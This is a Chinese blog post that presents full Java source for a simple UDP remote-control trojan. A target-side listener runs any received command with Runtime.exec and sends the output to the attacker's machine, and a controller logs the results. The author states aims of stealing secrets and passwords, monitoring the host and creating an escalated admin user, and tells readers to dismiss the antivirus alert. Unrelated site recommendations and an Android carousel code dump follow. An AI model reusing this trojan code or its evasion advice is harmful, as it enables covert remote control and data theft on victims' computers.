Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)

最新推荐文章于 2024-06-11 16:38:56 发布
最新推荐文章于 2024-06-11 16:38:56 发布
阅读量1.9k 收藏 20
点赞数 3
分类专栏: Java 安全 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47034674/article/details/110205544
版权

闲来无事,想着利用套接字和exec()这个方法调用cmd命令并将结果通过套接字反馈到黑客电脑上,将结果写入一个文件便于以后分析。(比如窃取目标机密信息、密码、监控对方主机、查看对方CPU、内存信息,另外就是新建用户并提权便于黑客后面登陆)
开发环境:IntelljIDEA 2020+JDK1.8
Win10主机(ip:192.168.1.106)和Win7虚拟机(ip:192.168.1.107)上测试
代码如下:
黑客端:(套接字的客户端)

package UDP;
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.util.Scanner;
import java.io.*;
public class hack {
    public static void main(String[] args) throws IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket();
            Scanner input=new Scanner(System.in);
            System.out.println("请输入要执行的命令");
            String str = input.nextLine();
            byte[] bytes = str.getBytes();
            InetAddress ip = InetAddress.getByName("192.168.1.107");
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length, ip, 9999);
            ds.send(dp);
            byte[] bytes2=new byte[4096];
            ds.close();
            DatagramSocket ds2=new DatagramSocket(8888);
            DatagramPacket dp2=new DatagramPacket(bytes2,bytes2.length);
            ds2.receive(dp2);
            byte[] bytes3=dp2.getData();
            int leng=dp2.getLength();
            File f=new File("D:\\Trojan\\infomation\\infos");
            if(!f.exists()){
                f.createNewFile();
            }
            String info=new String(bytes3,0,leng,"gbk");
            FileWriter fw=new FileWriter(f,true);
            BufferedWriter bw=new BufferedWriter(fw);
            bw.write(info);
            bw.flush();
            bw.close();
            ds2.close();
        }
    }
}

被劫持主机(套接字服务端):

package UDP;
import java.io.IOException;
import java.io.InputStream;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
public class target {
    public static void main(String[] args) throws  IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket(9999);
            byte[] bytes = new byte[1024];
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length);
            ds.receive(dp);
            byte[] bytes2 = dp.getData();
            int leng = dp.getLength();
            String command=new String(bytes2, 0, leng);
            Runtime rt=Runtime.getRuntime();
            Process pr=rt.exec(command);
            InputStream is=pr.getInputStream();
            byte[] bytes3=new byte[4096];
            while(is.read(bytes3,0,bytes3.length)!=-1){

            }
            ds.close();
            DatagramSocket ds2=new DatagramSocket();
            InetAddress ip=InetAddress.getByName("192.168.1.106");
           DatagramPacket dp2=new DatagramPacket(bytes3,bytes.length,ip,8888);
           ds2.send(dp2);
         ds2.close();
        }
    }
}

测试结果:
在这里插入图片描述
在这里插入图片描述
通过以上命令得到的数据也返回到了infos文件里面了。
在这里插入图片描述
更重要的,通过命令建立的hack用户并提权也成功在虚拟机上建立了。
在这里插入图片描述
虚拟机上的360还是比较灵的,刚输完命令运行马上报警:
在这里插入图片描述
在这里插入图片描述
点允许即可。
当然,这只是很Low很Low的一个木马,初具雏形而已。如何隐藏、定时启动、自动上传文件、修改注册表等等都未完成,感兴趣的朋友可以下去自行补充。。。。。

ChristopherIn
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
java木马_Java也能木马~(附源码!) | 学步园
weixin_35971653的博客
02-12 1364
这个小程序是很久以前的,现在发上来(仅供大家学习参考,不能用于任何非法行为~)木马定义:利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。当然我的这个没这么“强大”。。。首先讲下我的实现思路:主要通过Socket和ServerSocket之间传输数据。由于我没有自己的一个服务器(没有固定IP...
安全技术系列之Java一句话木马
好记性不如烂笔头
10-14 4303
安全技术系列文章
java 木马编程_Java木马程序源码,仅供学习参考使用
weixin_36415835的博客
02-13 415
【实例简介】/** 本程序仅供学习参考使用。严禁使用本程序进行违法行为!* 本程序功能* 1、程序开机自动启动(√)* 2、自动发送邮件* 3、执行dos命令,并将信息返回、这里可以执行关机等命令(√)* 4、锁定鼠标,这里通过一个线程实现* 5、查看被控制端的桌面,将桌面画面截图并发送给控制端(√)* 6、在被控制端弹出对话框,多种对话框模式(√)* 7、让被控制端闪屏(√)* 本程序仅供学习参...
Java内存马 原理、实战与查杀】
weixin_46318447的博客
06-11 1323
内存马原理 、实战与查杀
java木马
qq_58000413的博客
03-28 324
需要指定参数一:命令位置;参数二:-c表示先执行第一个参数;这里执行命令的主要用的是exec函数。执行cmd命令,输出whoami结果。
java 木马开发(4)---服务端 ---接收指令函数takeOrder()
zkwniky的博客
01-28 808
本函数是核心函数,用来接收控制端自定义的命令,如果不符合自定义命令,则windows将会调用被控制端cmd,linux调用被控制端shell //不断的循环接收控制端传来的指令,并根据指令进行判断,到达不同的控制流     void takeOrder() {         while (true) {                          try {
java怎么编木马,实现简单木马免杀(示例代码)
weixin_39755890的博客
03-22 1116
今天所学的知识一共有以下几点:ms08-067漏洞复现ms10-046漏洞复现木马免杀前面几个漏洞复现就不详细说了,跟着步骤操作基本可以成功,主要说一下今天做的简单木马免杀,下面进入正题。木马免杀Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,我是使用的shellter免杀,做的不是很好,跟大家分享一下我的实验结果。原理:生成木马文件,然后将生成的木马文件与*...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
基于jQuery实现自动轮播旋转木马特效
11-26
通过以上步骤,一个基本的基于jQuery的自动轮播旋转木马特效就可以实现。开发者可以根据需求进一步定制样式和交互,增强用户体验。同时,jQuery社区提供了许多类似的插件,如Slick Carousel、Bootstrap Carousel等,...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
基于机器学习的木马检测模型的设计与实现(论文)-kaic.docx
04-04
4 基于机器学习分类模型的 JavaScript 木马检测 4.1 检测的整体流程 4.2 数据集的获取 4.3 数据集处理 4.3.1 数据集导入 4.3.2 数据集清洗 4.4 数据集的特征提取 4.5 训练集的划分和模型调参 4.6 实验结果与对比 ...
手把手简单制作一个 Java 木马程序
xmt1139057136的专栏
08-01 6979
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草juejin.cn/post/6990715558178062372推荐:...
java木马源码_用Java木马程序【附源代码下载】
weixin_39583521的博客
02-19 1399
Java木马程序是很久以前的,现在发出来(仅供大家学习参考,不得用于任何非法行为~)木马定义:利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。当然我的这个木马没这么“强大”。。。首先讲下我的实现思路:主要通过Socket和ServerSocket之间传输数据。由于我没有自己的一个服务...
Java -- 一句话木马
tryheart的博客
08-26 2331
Java调用计算机程序 import java.io.IOException; public class WebShell { public static void main(String[] args) throws IOException { Runtime.getRuntime().exec("calc"); } } 调用cmd命令 import java.io.IOException; import java.io.InputStream; import
udp攻击的PHP木马
sshack的专栏
10-21 2759
关于近期一些服务器遭受UDP攻击的说明<br />近来我有一两台服务器显示经常受到udp攻击<br />导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的<br />下面我想说一下被入侵的原理<br />用户程序中的一个php页面的原代码:<br /><?php<br />/*<br />gl<br /><br />*/<br />eval(gzinflate(base64_decode('DZN
java 木马开发(1)
zkwniky的博客
01-15 5276
曾经研究过一段时间的逆向、破解、木马病毒之类的,很多人说,Java不能木马,当时气不过,就一个简单的木马。最近一段时间有些闲,整理一些以前的代码,也是一个学习的过程。 现在将木马运行的效果贴一下,在以后的过程中,回分几部分将代码讲解清楚贴出来,希望大家多提宝贵意见。 服务端每隔5秒钟运行一次监听 =================================
Java木马(2)==服务端模块(判断操作系统)
zkwniky的博客
01-15 824
木马为直连木马,不通过第三方跳转。此处的概念不介绍过多。 概念介绍:服务端(被控制方运行的程序)               客户端(控制方运行的程序) 此处涉及到了System类,java的System类代表系统,涉及系统的很多属性和控制方法都在这个类里面。 system类中的成员方法和成员变量都是static的,成员方法getProperty()函数定义如下 public s
UDP协议的木马方法(Delphi
xiaofengtoo的专栏
12-31 192
UDP协议的木马方法(Delphi)   木马一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。 一、软硬件要求。 Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 协议,并正确配置。如没有网络,也可以在一台计算机上进行调...
一个旋转木马自定义控件
06-07
好的,我可以给您提供一个简单的旋转木马自定义控件的实现。这个控件可以显示一组图片,并支持手势滑动和点击事件。以下是实现步骤: 1. 定义 CarouselItem 类,用于表示旋转木马中的每个项目。该类应该包含一个 ImageView 和一些用于描述该项目的元数据(如标题、描述等)。 ```java public class CarouselItem { private String title; private String description; private int imageResId; // 构造函数和 getter/setter 方法 // ... } ``` 2. 创建一个继承自 ViewGroup 的自定义控件类 CarouselView。该类应该包含一个 List<CarouselItem> 成员变量,用于存储所有的项目,以及一个 int 类型的成员变量 currentIndex,表示当前选中的项目的索引。 ```java public class CarouselView extends ViewGroup { private List<CarouselItem> items; private int currentIndex; // 构造函数和一些初始化方法 // ... @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { // 测量子视图的大小 // ... } @Override protected void onLayout(boolean changed, int l, int t, int r, int b) { // 安排子视图的位置 // ... } @Override public boolean onTouchEvent(MotionEvent event) { // 处理手势滑动事件 // ... } } ``` 3. 在 CarouselView 中添加一个方法 loadItems(List<CarouselItem> items),用于加载所有的项目,并将它们添加到该控件中。在该方法中,我们可以创建一个 ImageView 和一些 TextView,用于显示每个项目的元数据,并将它们包装成一个 CarouselItem 对象。然后,我们可以将所有的 CarouselItem 对象添加到一个 List 中,并调用 requestLayout() 方法来重新布局子视图。 ```java public void loadItems(List<CarouselItem> items) { this.items = items; removeAllViews(); for (CarouselItem item : items) { ImageView imageView = new ImageView(getContext()); imageView.setImageResource(item.getImageResId()); addView(imageView); TextView titleView = new TextView(getContext()); titleView.setText(item.getTitle()); addView(titleView); TextView descView = new TextView(getContext()); descView.setText(item.getDescription()); addView(descView); } // 重新布局子视图 requestLayout(); } ``` 4. 在 CarouselView 中添加一个方法 setCurrentIndex(int index),用于设置当前选中的项目的索引。在该方法中,我们可以根据 currentIndex 和 index 的差值,计算出需要旋转的角度,并使用 ViewPropertyAnimator 来执行旋转动画。 ```java public void setCurrentIndex(int index) { int diff = index - currentIndex; if (diff == 0) { return; } float angle = -diff * 45.0f; // 每个项目旋转 45 度 animate().rotationBy(angle) .setDuration(200) .start(); currentIndex = index; } ``` 5. 最后,我们可以在 CarouselView 中添加一个接口 OnItemClickListener,用于监听项目的点击事件。在 onTouchEvent() 方法中,当用户手指离开屏幕时,我们可以根据手指移动的距离和方向,来确定当前选中的项目,并调用 setCurrentIndex() 方法来设置当前选中的项目的索引。在 performClick() 方法中,我们可以调用 OnItemClickListener 的回调方法来通知外部代码,用户已经点击了某个项目。 完整的代码实现如下: ```java public class CarouselView extends ViewGroup { private List<CarouselItem> items; private int currentIndex; private float startX; private float startY; private OnItemClickListener onItemClickListener; public CarouselView(Context context) { super(context); init(); } public CarouselView(Context context, AttributeSet attrs) { super(context, attrs); init(); } public CarouselView(Context context, AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); init(); } private void init() { items = new ArrayList<>(); currentIndex = 0; setClickable(true); } public void loadItems(List<CarouselItem> items) { this.items = items; removeAllViews(); for (CarouselItem item : items) { ImageView imageView = new ImageView(getContext()); imageView.setImageResource(item.getImageResId()); addView(imageView); TextView titleView = new TextView(getContext()); titleView.setText(item.getTitle()); addView(titleView); TextView descView = new TextView(getContext()); descView.setText(item.getDescription()); addView(descView); } requestLayout(); } public void setCurrentIndex(int index) { int diff = index - currentIndex; if (diff == 0) { return; } float angle = -diff * 45.0f; // 每个项目旋转 45 度 animate().rotationBy(angle) .setDuration(200) .start(); currentIndex = index; } public void setOnItemClickListener(OnItemClickListener listener) { onItemClickListener = listener; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { int width = MeasureSpec.getSize(widthMeasureSpec); int height = MeasureSpec.getSize(heightMeasureSpec); int childWidth = (int) (width * 0.6f); int childHeight = (int) (childWidth * 1.2f); for (int i = 0; i < getChildCount(); i++) { View child = getChildAt(i); child.measure(MeasureSpec.makeMeasureSpec(childWidth, MeasureSpec.EXACTLY), MeasureSpec.makeMeasureSpec(childHeight, MeasureSpec.EXACTLY)); } setMeasuredDimension(width, height); } @Override protected void onLayout(boolean changed, int l, int t, int r, int b) { int centerX = (r - l) / 2; int centerY = (b - t) / 2; int radius = (int) (Math.min(centerX, centerY) * 0.8f); int count = getChildCount(); for (int i = 0; i < count; i++) { View child = getChildAt(i); int x = centerX + (int) (radius * Math.sin(i * Math.PI / 3)); int y = centerY + (int) (radius * Math.cos(i * Math.PI / 3)); int left = x - child.getMeasuredWidth() / 2; int top = y - child.getMeasuredHeight() / 2; int right = left + child.getMeasuredWidth(); int bottom = top + child.getMeasuredHeight(); child.layout(left, top, right, bottom); } } @Override public boolean onTouchEvent(MotionEvent event) { switch (event.getAction()) { case MotionEvent.ACTION_DOWN: startX = event.getX(); startY = event.getY(); break; case MotionEvent.ACTION_UP: float endX = event.getX(); float endY = event.getY(); float dx = endX - startX; float dy = endY - startY; if (Math.abs(dx) < 10 && Math.abs(dy) < 10) { performClick(); int count = getChildCount(); for (int i = 0; i < count; i++) { View child = getChildAt(i); if (child instanceof ImageView) { int[] loc = new int[2]; child.getLocationOnScreen(loc); Rect rect = new Rect(loc[0], loc[1], loc[0] + child.getWidth(), loc[1] + child.getHeight()); if (rect.contains((int) endX, (int) endY)) { if (onItemClickListener != null) { onItemClickListener.onItemClick(i / 3); // 每个项目占用 3 个子视图 } break; } } } } else { if (dx > 0) { setCurrentIndex(currentIndex - 1); } else { setCurrentIndex(currentIndex + 1); } } break; } return true; } @Override public boolean performClick() { return super.performClick(); } public interface OnItemClickListener { void onItemClick(int index); } } ``` 这个控件的用法非常简单。首先,您需要创建一个 CarouselItem 的列表,用于存储所有的项目。然后,您可以创建一个 CarouselView 对象,并调用它的 loadItems() 方法来加载项目。最后,您可以使用 setOnItemClickListener() 方法来监听项目的点击事件。 ```java CarouselView carouselView = findViewById(R.id.carousel_view); List<CarouselItem> items = new ArrayList<>(); items.add(new CarouselItem("Title 1", "Description 1", R.drawable.image1)); items.add(new CarouselItem("Title 2", "Description 2", R.drawable.image2)); items.add(new CarouselItem("Title 3", "Description 3", R.drawable.image3)); carouselView.loadItems(items); carouselView.setOnItemClickListener(new CarouselView.OnItemClickListener() { @Override public void onItemClick(int index) { // 处理项目的点击事件 } }); ```
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ChristopherIn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值